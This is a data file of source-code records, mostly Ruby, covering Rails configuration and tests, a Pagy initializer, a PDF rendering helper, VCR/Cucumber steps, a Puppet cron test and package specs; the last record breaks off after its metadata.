hexsha
stringlengths
40
40
size
int64
2
1.01M
content
stringlengths
2
1.01M
avg_line_length
float64
1.5
100
max_line_length
int64
2
1k
alphanum_fraction
float64
0.25
1
ab3c87d0f1bef40036609353d2be1ca1e7636a18
7,676
# frozen_string_literal: true # Pagy initializer file (4.7.1) # Customize only what you really need and notice that Pagy works also without any of the following lines. # Should you just cherry pick part of this file, please maintain the require-order of the extras # Pagy Variables # See https://ddnexus.github.io/pagy/api/pagy#variables # All the Pagy::VARS are set for all the Pagy instances but can be overridden # per instance by just passing them to Pagy.new or the #pagy controller method # Instance variables # See https://ddnexus.github.io/pagy/api/pagy#instance-variables # Pagy::VARS[:page] = 1 # default # Pagy::VARS[:items] = 20 # default # Pagy::VARS[:outset] = 0 # default # Other Variables # See https://ddnexus.github.io/pagy/api/pagy#other-variables # Pagy::VARS[:size] = [1,4,4,1] # default # Pagy::VARS[:page_param] = :page # default # Pagy::VARS[:params] = {} # default # Pagy::VARS[:fragment] = '#fragment' # example # Pagy::VARS[:link_extra] = 'data-remote="true"' # example # Pagy::VARS[:i18n_key] = 'pagy.item_name' # default # Pagy::VARS[:cycle] = true # example # Extras # See https://ddnexus.github.io/pagy/extras # Backend Extras # Array extra: Paginate arrays efficiently, avoiding expensive array-wrapping and without overriding # See https://ddnexus.github.io/pagy/extras/array # require 'pagy/extras/array' # Countless extra: Paginate without any count, saving one query per rendering # See https://ddnexus.github.io/pagy/extras/countless # require 'pagy/extras/countless' # Elasticsearch Rails extra: Paginate `ElasticsearchRails::Results` objects # See https://ddnexus.github.io/pagy/extras/elasticsearch_rails # default :pagy_search method: change only if you use # also the searchkick extra that defines the same # VARS[:elasticsearch_rails_search_method] = :pagy_search # require 'pagy/extras/elasticsearch_rails' # Searchkick extra: Paginate `Searchkick::Results` objects # See https://ddnexus.github.io/pagy/extras/searchkick # default :pagy_search method: change only if you use # also the elasticsearch_rails extra that defines the same # VARS[:searchkick_search_method] = :pagy_search # require 'pagy/extras/searchkick' # Frontend Extras # Bootstrap extra: Add nav, nav_js and combo_nav_js helpers and templates for Bootstrap pagination # See https://ddnexus.github.io/pagy/extras/bootstrap # require 'pagy/extras/bootstrap' # Bulma extra: Add nav, nav_js and combo_nav_js helpers and templates for Bulma pagination # See https://ddnexus.github.io/pagy/extras/bulma # require 'pagy/extras/bulma' # Foundation extra: Add nav, nav_js and combo_nav_js helpers and templates for Foundation pagination # See https://ddnexus.github.io/pagy/extras/foundation # require 'pagy/extras/foundation' # Materialize extra: Add nav, nav_js and combo_nav_js helpers for Materialize pagination # See https://ddnexus.github.io/pagy/extras/materialize # require 'pagy/extras/materialize' # Navs extra: Add nav_js and combo_nav_js javascript helpers # Notice: the other frontend extras add their own framework-styled versions, # so require this extra only if you need the unstyled version # See https://ddnexus.github.io/pagy/extras/navs # require 'pagy/extras/navs' # Semantic extra: Add nav, nav_js and combo_nav_js helpers for Semantic UI pagination # See https://ddnexus.github.io/pagy/extras/semantic # require 'pagy/extras/semantic' # UIkit extra: Add nav helper and templates for UIkit pagination # See https://ddnexus.github.io/pagy/extras/uikit # require 'pagy/extras/uikit' # Multi size var used by the *_nav_js helpers # See https://ddnexus.github.io/pagy/extras/navs#steps # Pagy::VARS[:steps] = { 0 => [2,3,3,2], 540 => [3,5,5,3], 720 => [5,7,7,5] } # example # Feature Extras # Headers extra: http response headers (and other helpers) useful for API pagination # See http://ddnexus.github.io/pagy/extras/headers # require 'pagy/extras/headers' # Pagy::VARS[:headers] = { page: 'Current-Page', items: 'Page-Items', count: 'Total-Count', pages: 'Total-Pages' } # default # Support extra: Extra support for features like: incremental, infinite, auto-scroll pagination # See https://ddnexus.github.io/pagy/extras/support # require 'pagy/extras/support' # Items extra: Allow the client to request a custom number of items per page with an optional selector UI # See https://ddnexus.github.io/pagy/extras/items # require 'pagy/extras/items' # Pagy::VARS[:items_param] = :items # default # Pagy::VARS[:max_items] = 100 # default # set to false if you want to make :enable_items_extra an opt-in variable # Pagy::VARS[:enable_items_extra] = false # default true # Overflow extra: Allow for easy handling of overflowing pages # See https://ddnexus.github.io/pagy/extras/overflow # require 'pagy/extras/overflow' # Pagy::VARS[:overflow] = :empty_page # default (other options: :last_page and :exception) # Metadata extra: Provides the pagination metadata to Javascript frameworks like Vue.js, react.js, etc. # See https://ddnexus.github.io/pagy/extras/metadata # you must require the shared internal extra (BEFORE the metadata extra) ONLY if you need also the :sequels # require 'pagy/extras/shared' # require 'pagy/extras/metadata' # For performance reason, you should explicitly set ONLY the metadata you use in the frontend # Pagy::VARS[:metadata] = [:scaffold_url, :count, :page, :prev, :next, :last] # example # Trim extra: Remove the page=1 param from links # See https://ddnexus.github.io/pagy/extras/trim # require 'pagy/extras/trim' # after requiring it will trim by default # set to false if you want to make :enable_trim_extra an opt-in variable # Pagy::VARS[:enable_trim_extra] = false # default true # Rails # Rails: extras assets path required by the helpers that use javascript # (pagy*_nav_js, pagy*_combo_nav_js, and pagy_items_selector_js) # See https://ddnexus.github.io/pagy/extras#javascript # Rails.application.config.assets.paths << Pagy.root.join('javascripts') # I18n # Pagy internal I18n: ~18x faster using ~10x less memory than the i18n gem # See https://ddnexus.github.io/pagy/api/frontend#i18n # Notice: No need to configure anything in this section if your app uses only "en" # or if you use the i18n extra below # # Examples: # load the "de" built-in locale: # Pagy::I18n.load(locale: 'de') # # load the "de" locale defined in the custom file at :filepath: # Pagy::I18n.load(locale: 'de', filepath: 'path/to/pagy-de.yml') # # load the "de", "en" and "es" built-in locales: # (the first passed :locale will be used also as the default_locale) # Pagy::I18n.load({locale: 'de'}, # {locale: 'en'}, # {locale: 'es'}) # # load the "en" built-in locale, a custom "es" locale, # and a totally custom locale complete with a custom :pluralize proc: # (the first passed :locale will be used also as the default_locale) # Pagy::I18n.load({locale: 'en'}, # {locale: 'es', filepath: 'path/to/pagy-es.yml'}, # {locale: 'xyz', # not built-in # filepath: 'path/to/pagy-xyz.yml', # pluralize: lambda{|count| ... } ) # I18n extra: uses the standard i18n gem which is ~18x slower using ~10x more memory # than the default pagy internal i18n (see above) # See https://ddnexus.github.io/pagy/extras/i18n # require 'pagy/extras/i18n' # Default i18n key # Pagy::VARS[:i18n_key] = 'pagy.item_name' # default
42.40884
128
0.706748
e27d9ed255ed9fc5ae7f07ce758f071369128c15
1,064
require 'test_helper' class Attr3sControllerTest < ActionController::TestCase setup do @attr3 = attr3s(:one) end test "should get index" do get :index assert_response :success assert_not_nil assigns(:attr3s) end test "should get new" do get :new assert_response :success end test "should create attr3" do assert_difference('Attr3.count') do post :create, attr3: { name: @attr3.name, tenant_id: @attr3.tenant_id } end assert_redirected_to attr3_path(assigns(:attr3)) end test "should show attr3" do get :show, id: @attr3 assert_response :success end test "should get edit" do get :edit, id: @attr3 assert_response :success end test "should update attr3" do patch :update, id: @attr3, attr3: { name: @attr3.name, tenant_id: @attr3.tenant_id } assert_redirected_to attr3_path(assigns(:attr3)) end test "should destroy attr3" do assert_difference('Attr3.count', -1) do delete :destroy, id: @attr3 end assert_redirected_to attr3s_path end end
21.28
88
0.68609
e237e45654c837090aef70a3e906ba9f2e0653dc
426
# encoding: utf-8 # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::KeyVault::V2015_06_01 module Models # # Defines values for JsonWebKeyEncryptionAlgorithm # module JsonWebKeyEncryptionAlgorithm RSAOAEP = "RSA-OAEP" RSAOAEP256 = "RSA-OAEP-256" RSA15 = "RSA1_5" end end end
23.666667
70
0.706573
e94aa3628e7d23aaf9b965ec170fca8a24459b8c
373
require_relative '../automated_init' context "Data Structure" do test "Is a Schema object" do ancestors = Schema::Controls::DataStructure.ancestors assert(ancestors.include? Schema) end test "Can configure its dependencies" do example = Schema::Controls::DataStructure::ConfigureDependencies.example assert(example.some_dependency = :set) end end
26.642857
76
0.753351
089304ed4a4f409435e4ea8ad3372615f272efa3
457
require 'benchmark/ips' require 'benchmark/ipsa' require 'sentry-raven-without-integrations' Raven.configure do |config| config.logger = Logger.new(nil) config.dsn = "dummy://12345:[email protected]:3000/sentry/42" end exception = begin 1/0 rescue => e e end Raven.capture_exception(exception) report = MemoryProfiler.report do Raven.capture_exception(exception) end report.pretty_print
19.869565
70
0.691466
bf7f25cb8d01be92fe3f70030f729b56c0ab023d
1,812
require 'spec_helper' describe Volunteer do describe '#name' do it 'returns the name of the volunteer' do test_volunteer = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil}) expect(test_volunteer.name).to eq 'Jane' end end describe '#project_id' do it 'returns the project_id of the volunteer' do test_volunteer = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil}) expect(test_volunteer.project_id).to eq 1 end end # describe '#==' do it 'checks for equality based on the name of a volunteer' do volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil}) volunteer2 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil}) expect(volunteer1 == volunteer2).to eq true end end # context '.all' do it 'is empty to start' do expect(Volunteer.all).to eq [] end # it 'returns all volunteers' do volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil}) volunteer1.save volunteer2 = Volunteer.new({:name => 'Joe', :project_id => 1, :id => nil}) volunteer2.save expect(Volunteer.all).to eq [volunteer1, volunteer2] end end # describe '#save' do it 'adds a volunteer to the database' do volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil}) volunteer1.save expect(Volunteer.all).to eq [volunteer1] end end # describe '.find' do it 'returns a volunteer by id' do volunteer1 = Volunteer.new({:name => 'Jane', :project_id => 1, :id => nil}) volunteer1.save volunteer2 = Volunteer.new({:name => 'Joe', :project_id => 1, :id => nil}) volunteer2.save expect(Volunteer.find(volunteer1.id)).to eq volunteer1 end end end
31.241379
85
0.612583
79535fd50c404ed11610dda1953cebbad675eabb
2,126
#-- # Project: google_checkout4r # File: test/unit/carrier_calculated_shipping_test.rb # Author: Tony Chan <api.htchan at gmail dot com> # Copyright: (c) 2007 by Manuel Holtgrewe # License: MIT License as follows: # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the # following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY # CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, # TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE # OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. #++ require File.expand_path(File.dirname(__FILE__)) + '/../test_helper' require 'google4r/checkout' require 'test/frontend_configuration' # Test for the FlatRateShipping class. class Google4R::Checkout::CarrierCalculatedShippingTest < Test::Unit::TestCase include Google4R::Checkout def setup @shipping = CarrierCalculatedShipping.new end def test_carrier_calculated_shipping_method_behaves_correctly [ :carrier_calculated_shipping_options, :shipping_packages, :create_carrier_calculated_shipping_option, :create_shipping_package, :create_from_element ].each do |symbol| assert_respond_to @shipping, symbol end end def test_initialization assert_equal [], @shipping.carrier_calculated_shipping_options assert_equal [], @shipping.shipping_packages end end
37.298246
78
0.765757
18605fface1f7afe833dd107108cb7a3d25a501a
799
Rails.application.routes.draw do root 'static_pages#home' get '/help', to: 'static_pages#help' get '/about', to: 'static_pages#about' get '/contact', to: 'static_pages#contact' get '/signup', to: 'users#new' get '/login', to: 'sessions#new' get '/blocked_users', to: 'blocked_users#index' post '/login', to: 'sessions#create' delete '/logout', to: 'sessions#destroy' resources :users do member do get :following, :followers get :block put :block put :unblock end end resources :account_activations, only: [:edit] resources :password_resets, only: [:new, :create, :edit, :update] resources :microposts, only: [:create, :destroy] resources :relationships, only: [:create, :destroy] end
31.96
71
0.624531
4af72f5d2f4a1eb19de29f143ef73eb3ae8a0beb
762
# typed: false require 'spec_helper' require 'ddtrace/profiling/transport/parcel' RSpec.describe Datadog::Profiling::Transport::Parcel do subject(:parcel) { described_class.new(data) } let(:data) { instance_double(Array) } it { is_expected.to be_a_kind_of(Datadog::Transport::Parcel) } describe '#initialize' do it { is_expected.to have_attributes(data: data) } end describe '#encode_with' do subject(:encode_with) { parcel.encode_with(encoder) } let(:encoder) { instance_double(Datadog::Encoding::Encoder) } let(:encoded_data) { double('encoded data') } before do expect(encoder).to receive(:encode) .with(data) .and_return(encoded_data) end it { is_expected.to be encoded_data } end end
23.8125
65
0.695538
bfb6c589bb464592994ef46da0bd200d50e67130
60
json.extract! @domain, :id, :name, :created_at, :updated_at
30
59
0.716667
912cd9bc4e621dbd2686bb9377a94e53556ede85
1,762
# # Be sure to run `pod lib lint TGCore.podspec' to ensure this is a # valid spec before submitting. # # Any lines starting with a # are optional, but their use is encouraged # To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html # Pod::Spec.new do |s| s.name = 'TGCore' s.version = '0.1.1' s.summary = 'This is a pod with a MVVM skeleton that helps to start swiftUI projects' # This description is used to generate tags and improve search results. # * Think: What does it do? Why did you write it? What is the focus? # * Try to keep it short, snappy and to the point. # * Write the description between the DESC delimiters below. # * Finally, don't worry about the indent, CocoaPods strips it! s.description = <<-DESC A pod for my own use MVVM example. This is a pod with a MVVM skeleton that helps to start swiftUI projects DESC s.homepage = 'https://github.com/alexdelgadodiaz/mypod' # s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2' s.license = { :type => 'MIT', :file => 'LICENSE' } s.author = { 'Alejandro Delgado' => '[email protected]' } s.source = { :git => 'https://github.com/Alejandro Delgado/TGCore.git', :tag => s.version.to_s } # s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>' s.ios.deployment_target = '13.0' s.swift_versions = '5.1' s.source_files = 'TGCore/Classes/**/*' # s.resource_bundles = { # 'TGCore' => ['TGCore/Assets/*.png'] # } # s.public_header_files = 'Pod/Classes/**/*.h' # s.frameworks = 'UIKit', 'MapKit' # s.dependency 'Parse', '~> 2.3' s.dependency 'Parse', '~> 1.17.3' end
39.155556
108
0.642452
6a7581fa52fd740206556747c7250cf109f8bdd7
192
require 'rails_helper' RSpec.describe Activity, type: :model do it { should belong_to(:user) } it { should validate_presence_of(:kind) } it { should validate_presence_of(:amount) } end
24
45
0.734375
625ef63abbc08109e674e6529555146189750e13
3,677
module PdfHelper require 'wicked_pdf' require 'wicked_pdf_tempfile' def self.included(base) # Protect from trying to augment modules that appear # as the result of adding other gems. return if base != ActionController::Base base.class_eval do alias_method_chain :render, :wicked_pdf alias_method_chain :render_to_string, :wicked_pdf after_filter :clean_temp_files end end def render_with_wicked_pdf(options = nil, *args, &block) if options.is_a?(Hash) && options.has_key?(:pdf) log_pdf_creation options[:basic_auth] = set_basic_auth(options) make_and_send_pdf(options.delete(:pdf), (WickedPdf.config || {}).merge(options)) else render_without_wicked_pdf(options, *args, &block) end end def render_to_string_with_wicked_pdf(options = nil, *args, &block) if options.is_a?(Hash) && options.has_key?(:pdf) log_pdf_creation options[:basic_auth] = set_basic_auth(options) options.delete :pdf make_pdf((WickedPdf.config || {}).merge(options)) else render_to_string_without_wicked_pdf(options, *args, &block) end end private def log_pdf_creation logger.info '*'*15 + 'WICKED' + '*'*15 end def set_basic_auth(options={}) options[:basic_auth] ||= WickedPdf.config.fetch(:basic_auth){ false } if options[:basic_auth] && request.env["HTTP_AUTHORIZATION"] request.env["HTTP_AUTHORIZATION"].split(" ").last end end def clean_temp_files if defined?(@hf_tempfiles) @hf_tempfiles.each { |tf| tf.close! } end end def make_pdf(options = {}) html_string = render_to_string(:template => options[:template], :layout => options[:layout], :formats => options[:formats], :handlers => options[:handlers]) options = prerender_header_and_footer(options) w = WickedPdf.new(options[:wkhtmltopdf]) w.pdf_from_string(html_string, options) end def make_and_send_pdf(pdf_name, options={}) options[:wkhtmltopdf] ||= nil options[:layout] ||= false options[:template] ||= File.join(controller_path, action_name) options[:disposition] ||= "inline" if options[:show_as_html] render :template => options[:template], :layout => options[:layout], :formats => options[:formats], :handlers => options[:handlers], :content_type => "text/html" else pdf_content = make_pdf(options) File.open(options[:save_to_file], 'wb') {|file| file << pdf_content } if options[:save_to_file] send_data(pdf_content, :filename => pdf_name + '.pdf', :type => 'application/pdf', :disposition => options[:disposition]) unless options[:save_only] end end # Given an options hash, prerenders content for the header and footer sections # to temp files and return a new options hash including the URLs to these files. def prerender_header_and_footer(options) [:header, :footer].each do |hf| if options[hf] && options[hf][:html] && options[hf][:html][:template] @hf_tempfiles = [] if ! defined?(@hf_tempfiles) @hf_tempfiles.push( tf=WickedPdfTempfile.new("wicked_#{hf}_pdf.html") ) options[hf][:html][:layout] ||= options[:layout] tf.write render_to_string(:template => options[hf][:html][:template], :layout => options[hf][:html][:layout], :locals => options[hf][:html][:locals], :formats => options[hf][:html][:formats], :handlers => options[hf][:html][:handlers]) tf.flush options[hf][:html].delete(:template) options[hf][:html][:url] = "file://#{tf.path}" end end options end end
38.705263
245
0.655426
7a86229539270d7aa53f7c2d1533c67b710886b8
5,018
Rails.application.configure do # Settings specified here will take precedence over those in config/application.rb. # Code is not reloaded between requests. config.cache_classes = true # Eager load code on boot. This eager loads most of Rails and # your application in memory, allowing both threaded web servers # and those relying on copy on write to perform better. # Rake tasks automatically ignore this option for performance. config.eager_load = true # Full error reports are disabled and caching is turned on. config.consider_all_requests_local = false config.action_controller.perform_caching = true # Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"] # or in config/master.key. This key is used to decrypt credentials (and other encrypted files). # config.require_master_key = true # Disable serving static files from the `/public` folder by default since # Apache or NGINX already handles this. config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present? # Compress CSS using a preprocessor. # config.assets.css_compressor = :sass # Do not fallback to assets pipeline if a precompiled asset is missed. config.assets.compile = false # Enable serving of images, stylesheets, and JavaScripts from an asset server. # config.action_controller.asset_host = 'http://assets.example.com' # Specifies the header that your server uses for sending files. # config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache # config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX # Store uploaded files on the local file system (see config/storage.yml for options). config.active_storage.service = :local # Mount Action Cable outside main process or domain. # config.action_cable.mount_path = nil # config.action_cable.url = 'wss://example.com/cable' # config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ] # Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies. # config.force_ssl = true # Use the lowest log level to ensure availability of diagnostic information # when problems arise. config.log_level = :debug # Prepend all log lines with the following tags. config.log_tags = [ :request_id ] # Use a different cache store in production. # config.cache_store = :mem_cache_store # Use a real queuing backend for Active Job (and separate queues per environment). # config.active_job.queue_adapter = :resque # config.active_job.queue_name_prefix = "Relaxation_Parlor_production" config.action_mailer.perform_caching = false # Ignore bad email addresses and do not raise email delivery errors. # Set this to true and configure the email server for immediate delivery to raise delivery errors. # config.action_mailer.raise_delivery_errors = false # Enable locale fallbacks for I18n (makes lookups for any locale fall back to # the I18n.default_locale when a translation cannot be found). config.i18n.fallbacks = true # Send deprecation notices to registered listeners. config.active_support.deprecation = :notify # Use default logging formatter so that PID and timestamp are not suppressed. config.log_formatter = ::Logger::Formatter.new # Use a different logger for distributed setups. # require 'syslog/logger' # config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name') if ENV["RAILS_LOG_TO_STDOUT"].present? logger = ActiveSupport::Logger.new(STDOUT) logger.formatter = config.log_formatter config.logger = ActiveSupport::TaggedLogging.new(logger) end # Do not dump schema after migrations. config.active_record.dump_schema_after_migration = false # Inserts middleware to perform automatic connection switching. # The `database_selector` hash is used to pass options to the DatabaseSelector # middleware. The `delay` is used to determine how long to wait after a write # to send a subsequent read to the primary. # # The `database_resolver` class is used by the middleware to determine which # database is appropriate to use based on the time delay. # # The `database_resolver_context` class is used by the middleware to set # timestamps for the last write to the primary. The resolver uses the context # class timestamps to determine how long to wait before reading from the # replica. # # By default Rails will store a last write timestamp in the session. The # DatabaseSelector middleware is designed as such you can define your own # strategy for connection switching and pass that into the middleware through # these configuration options. # config.active_record.database_selector = { delay: 2.seconds } # config.active_record.database_resolver = ActiveRecord::Middleware::DatabaseSelector::Resolver # config.active_record.database_resolver_context = ActiveRecord::Middleware::DatabaseSelector::Resolver::Session end
44.40708
114
0.762654
01ba6efc5310e5c7d09fa586ab9d5435c8f4f521
1,438
# frozen_string_literal: true require 'spec_helper' RSpec.describe 'capybara/rspec', :type => :feature do it "should include Capybara in rspec" do visit('/foo') expect(page.body).to include('Another World') end context "resetting session" do it "sets a cookie in one example..." do visit('/set_cookie') expect(page.body).to include('Cookie set to test_cookie') end it "...then it is not available in the next" do visit('/get_cookie') expect(page.body).not_to include('test_cookie') end end context "setting the current driver" do it "sets the current driver in one example..." do Capybara.current_driver = :selenium end it "...then it has returned to the default in the next example" do expect(Capybara.current_driver).to eq(:rack_test) end end it "switches to the javascript driver when giving it as metadata", js: true do expect(Capybara.current_driver).to eq(Capybara.javascript_driver) end it "switches to the given driver when giving it as metadata", :driver => :culerity do expect(Capybara.current_driver).to eq(:culerity) end end RSpec.describe 'capybara/rspec', :type => :other do it "should not include Capybara" do expect { visit('/') }.to raise_error(NoMethodError) end end feature "Feature DSL" do scenario "is pulled in" do visit('/foo') expect(page.body).to include('Another World') end end
27.132075
87
0.689152
f7f64233a79edfb6aa802d2aeae330a8ffa9bb29
937
test_name "puppet should match existing job" confine :except, :platform => 'windows' require 'puppet/acceptance/common_utils' extend Puppet::Acceptance::CronUtils teardown do step "Cron: cleanup" agents.each do |agent| clean agent end end agents.each do |host| step "ensure the user exist via puppet" setup host step "Create the existing cron job by hand..." run_cron_on(host,:add,'tstuser',"* * * * * /bin/true") step "Apply the resource on the host using puppet resource" on(host, puppet_resource("cron", "crontest", "user=tstuser", "command=/bin/true", "ensure=present")) do assert_match(/present/, stdout, "Failed creating crontab for tstuser on #{host}") end step "Verify that crontab -l contains what you expected" run_cron_on(host, :list, 'tstuser') do assert_match(/\* \* \* \* \* \/bin\/true/, stdout, "Did not find crontab for tstuser on #{host}") end end
29.28125
101
0.676628
e898dc35abe597e48739dcb7a24d632d8b357632
5,596
require 'vcr' require 'multi_json' module VCRHelpers def normalize_cassette_hash(cassette_hash) cassette_hash['recorded_with'] = "VCR #{VCR.version}" cassette_hash['http_interactions'].map! { |h| normalize_http_interaction(h) } cassette_hash end def normalize_headers(object) object.headers = {} and return if object.headers.nil? object.headers = {}.tap do |hash| object.headers.each do |key, value| hash[key.downcase] = value end end end def static_timestamp @static_timestamp ||= Time.now end def normalize_http_interaction(hash) VCR::HTTPInteraction.from_hash(hash).tap do |i| normalize_headers(i.request) normalize_headers(i.response) i.recorded_at &&= static_timestamp i.request.body ||= '' i.response.body ||= '' i.response.status.message ||= '' # Remove non-deterministic headers and headers # that get added by a particular HTTP library (but not by others) i.response.headers.reject! { |k, v| %w[ server date connection ].include?(k) } i.request.headers.reject! { |k, v| %w[ accept user-agent connection expect ].include?(k) } # Some HTTP libraries include an extra space ("OK " instead of "OK") i.response.status.message = i.response.status.message.strip if @scenario_parameters.to_s =~ /excon|faraday/ # Excon/Faraday do not expose the status message or http version, # so we have no way to record these attributes. i.response.status.message = nil i.response.http_version = nil elsif @scenario_parameters.to_s.include?('webmock') # WebMock does not expose the HTTP version so we have no way to record it i.response.http_version = nil end end end def normalize_cassette_content(content) return content unless @scenario_parameters.to_s.include?('patron') cassette_hash = YAML.load(content) cassette_hash['http_interactions'].map! do |hash| VCR::HTTPInteraction.from_hash(hash).tap do |i| i.request.headers = (i.request.headers || {}).merge!('Expect' => ['']) end.to_hash end YAML.dump(cassette_hash) end def modify_file(file_name, orig_text, new_text) in_current_dir do file = File.read(file_name) regex = /#{Regexp.escape(orig_text)}/ file.should =~ regex file = file.gsub(regex, new_text) File.open(file_name, 'w') { |f| f.write(file) } end end end World(VCRHelpers) Given /the following files do not exist:/ do |files| check_file_presence(files.raw.map{|file_row| file_row[0]}, false) end Given /^the directory "([^"]*)" does not exist$/ do |dir| check_directory_presence([dir], false) end Given /^a previously recorded cassette file "([^"]*)" with:$/ do |file_name, content| write_file(file_name, normalize_cassette_content(content)) end Given /^it is (.*)$/ do |date_string| set_env('DATE_STRING', date_string) end When /^I modify the file "([^"]*)" to replace "([^"]*)" with "([^"]*)"$/ do |file_name, orig_text, new_text| modify_file(file_name, orig_text, new_text) end When /^I set the "([^"]*)" environment variable to "([^"]*)"$/ do |var, value| set_env(var, value) end Then /^the file "([^"]*)" should exist$/ do |file_name| check_file_presence([file_name], true) end Then /^it should (pass|fail) with "([^"]*)"$/ do |pass_fail, partial_output| assert_exit_status_and_partial_output(pass_fail == 'pass', partial_output) end Then /^the output should contain each of the following:$/ do |table| table.raw.flatten.each do |string| assert_partial_output(string, all_output) end end Then /^the file "([^"]*)" should contain YAML like:$/ do |file_name, expected_content| actual_content = in_current_dir { File.read(file_name) } normalize_cassette_hash(YAML.load(actual_content)).should == normalize_cassette_hash(YAML.load(expected_content)) end Then /^the file "([^"]*)" should contain JSON like:$/ do |file_name, expected_content| actual_content = in_current_dir { File.read(file_name) } actual = MultiJson.decode(actual_content) expected = MultiJson.decode(expected_content) normalize_cassette_hash(actual).should == normalize_cassette_hash(expected) end Then /^the file "([^"]*)" should contain ruby like:$/ do |file_name, expected_content| actual_content = in_current_dir { File.read(file_name) } actual = eval(actual_content) expected = eval(expected_content) normalize_cassette_hash(actual).should == normalize_cassette_hash(expected) end Then /^the file "([^"]*)" should contain each of these:$/ do |file_name, table| table.raw.flatten.each do |string| check_file_content(file_name, string, true) end end Then /^the file "([^"]*)" should contain:$/ do |file_name, expected_content| check_file_content(file_name, expected_content, true) end Then /^the file "([^"]*)" should contain a YAML fragment like:$/ do |file_name, fragment| in_current_dir do file_content = File.read(file_name) # Normalize by removing leading and trailing whitespace... file_content = file_content.split("\n").map do |line| line.strip end.join("\n") file_content.should include(fragment) end end Then /^the cassette "([^"]*)" should have the following response bodies:$/ do |file, table| interactions = in_current_dir { YAML.load_file(file) }['http_interactions'].map { |h| VCR::HTTPInteraction.from_hash(h) } actual_response_bodies = interactions.map { |i| i.response.body } expected_response_bodies = table.raw.flatten actual_response_bodies.should =~ expected_response_bodies end
33.710843
123
0.696926
18f7714f75d150ce2e650bf1047e061cceb30852
458
cask :v1 => 'yubikey-neo-manager' do version '1.3.0' sha256 '9b28bc6350a7afe2e7e3e4397423359487de876ee67aafeca7902f9aaa5f1756' url "https://developers.yubico.com/yubikey-neo-manager/Releases/yubikey-neo-manager-#{version}-mac.pkg" name 'YubiKey NEO Manager' homepage 'https://developers.yubico.com/yubikey-neo-manager/' license :bsd pkg "yubikey-neo-manager-#{version}-mac.pkg" uninstall :pkgutil => 'com.yubico.pkg.YubiKeyNEOManager' end
32.714286
105
0.759825
21281cd6f2b058ed9c582f0ebc46586ff227a855
1,632
require 'test_helper' class UsersSignupTest < ActionDispatch::IntegrationTest def setup ActionMailer::Base.deliveries.clear end test "invalid signup information" do get signup_path assert_no_difference 'User.count' do post users_path, user: { name: "", email: "user@invalid", password: "foo", password_confirmation: "bar" } end assert_template 'users/new' assert_select 'div#error_explanation' assert_select 'div.field_with_errors' end test "valid signup information with account activation" do get signup_path assert_difference 'User.count', 1 do post users_path, user: { name: "Example User", email: "[email protected]", password: "password", password_confirmation: "password" } end assert_equal 1, ActionMailer::Base.deliveries.size user = assigns(:user) assert_not user.activated? # Try to log in before activation. log_in_as(user) assert_not is_logged_in? # Invalid activation token get edit_account_activation_path("invalid token") assert_not is_logged_in? # Valid token, wrong email get edit_account_activation_path(user.activation_token, email: 'wrong') assert_not is_logged_in? # Valid activation token get edit_account_activation_path(user.activation_token, email: user.email) assert user.reload.activated? follow_redirect! assert_template 'users/show' assert is_logged_in? end end
33.306122
78
0.64277
91791a254bf86ae85adbc0dd059853410fc39459
388
describe Joybox::UI::MenuLabel do behaves_like Joybox::UI::MenuLabel describe "Initialization" do it "should initialize with text & color" do color = "#FFFFFF".to_color menu_label = MenuLabel.new text: 'MenuLabel', color: color menu_label.should.not == nil menu_label.text.should == 'MenuLabel' menu_label.color.should.not == nil end end end
29.846154
64
0.680412
01bc52bdc011b6eaf81e5f4d35371543db31483c
1,132
require "bundler/setup" require "pry-byebug" require "pry-doc" require "rdoc_rubocop" RSpec.configure do |config| # Enable flags like --only-failures and --next-failure config.example_status_persistence_file_path = ".rspec_status" # Disable RSpec exposing methods globally on `Module` and `main` config.disable_monkey_patching! config.expect_with :rspec do |c| c.syntax = :expect end end class String # Simplified version of ActiveSupport # activesupport/lib/active_support/core_ext/string/strip.rb def strip_heredoc gsub(/^#{scan(/^ *(?=\S)/).min}/, "") end end # When stub FIle.open # # before do # expect(File).to receive(:open).with("output.txt", "w") # end # # and use binding.pry, raise a unexpected error: # # it do # binding.pry # expect { subject }.not_to raise_error # end # # #=> # #<File (class)> received :open with unexpected arguments # expected: ("output.txt", "w") # got: ("/home/user/.pry_history", "a", 123) # # To make easy to stub and debug, separate File is used in RuboCop from ::File. class RuboCop::Formatter::File < File; end
25.155556
79
0.673145
03fb9a70a57d81949573c4931dcb2b21c1a1fabe
6,049
